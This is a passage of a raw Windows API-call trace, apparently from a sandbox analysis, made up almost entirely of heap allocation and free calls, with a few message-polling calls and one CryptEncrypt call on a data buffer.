hHeap=0x970000) returned 1 [0235.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0235.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0235.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0235.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0235.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552b8 [0235.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0235.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0235.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0235.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0235.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0235.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0235.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55138 [0235.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0235.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0235.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0235.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0235.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0235.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0235.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55218 [0235.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0235.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0235.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0235.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0235.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0235.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0235.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0235.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0235.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0235.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0235.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0235.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0235.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0235.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0235.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0235.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0235.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0235.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0235.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0236.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0236.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55128 [0236.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0236.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0236.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0236.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0236.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0236.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0236.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0236.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0236.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0236.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0236.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f788 | out: hHeap=0x970000) returned 1 [0236.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0236.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0236.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0236.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0236.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0236.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0236.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0236.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0236.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0236.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0236.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0236.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0236.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0236.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0236.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0236.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0236.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0236.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0236.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0236.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0236.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0236.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0236.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0236.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0236.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0236.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0236.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0236.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0236.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0236.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0236.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0236.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0236.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0236.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0236.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0236.023] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0236.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0236.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0236.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0236.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0236.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0236.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0236.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0236.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0236.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0236.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0236.024] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0236.024] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0236.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0236.024] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0236.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0236.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0236.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0236.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0236.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0236.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0236.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0236.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0236.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0236.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0236.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0236.025] CharLowerBuffW (in: lpsz="byte[53640]", cchLength=0xb | out: lpsz="byte[53640]") returned 0xb [0236.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0236.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0236.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0236.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0236.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0236.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0236.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0236.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0236.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0236.025] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0236.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0236.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0236.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0236.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0236.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0236.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0236.030] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0236.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0236.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0236.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0236.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043b8 [0236.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0236.030] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0236.031] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0236.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0236.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0236.033] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0236.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0236.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0236.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0236.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0236.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0236.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e513b8 [0236.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e513b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0236.034] CryptEncrypt (in: hKey=0xa872d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f3bcb0*, pdwDataLen=0x8cef60*=0xd180, dwBufLen=0xd188 | out: pbData=0x2f3bcb0*, pdwDataLen=0x8cef60*=0xd188) returned 1 [0236.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978518 [0236.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0236.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0236.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0236.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0236.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0236.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552f8 [0236.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0236.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552f8 | out: hHeap=0x970000) returned 1 [0236.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0236.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0236.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0236.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0236.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551e8 [0236.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0236.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0236.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0236.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0236.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0236.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0236.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55198 [0236.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0236.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55198 | out: hHeap=0x970000) returned 1 [0236.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0236.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0236.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0236.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0236.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55288 [0236.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0236.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0236.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0236.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0236.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0236.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0236.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55168 [0236.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0236.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55168 | out: hHeap=0x970000) returned 1 [0236.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0236.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0236.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0236.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0236.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0236.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0236.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0236.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0236.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0236.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977938 [0236.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0236.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55168 [0236.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0236.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0236.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0236.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55128 [0236.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0236.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0236.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0236.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0236.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0236.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0236.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551b8 [0236.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0236.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0236.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0236.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0236.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0236.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0236.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0236.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0236.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0236.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0236.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4b8 | out: hHeap=0x970000) returned 1 [0236.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0236.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0236.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0236.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0236.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0236.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0236.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0236.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0236.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0236.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0236.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0236.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0236.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0236.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0236.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0236.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0236.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 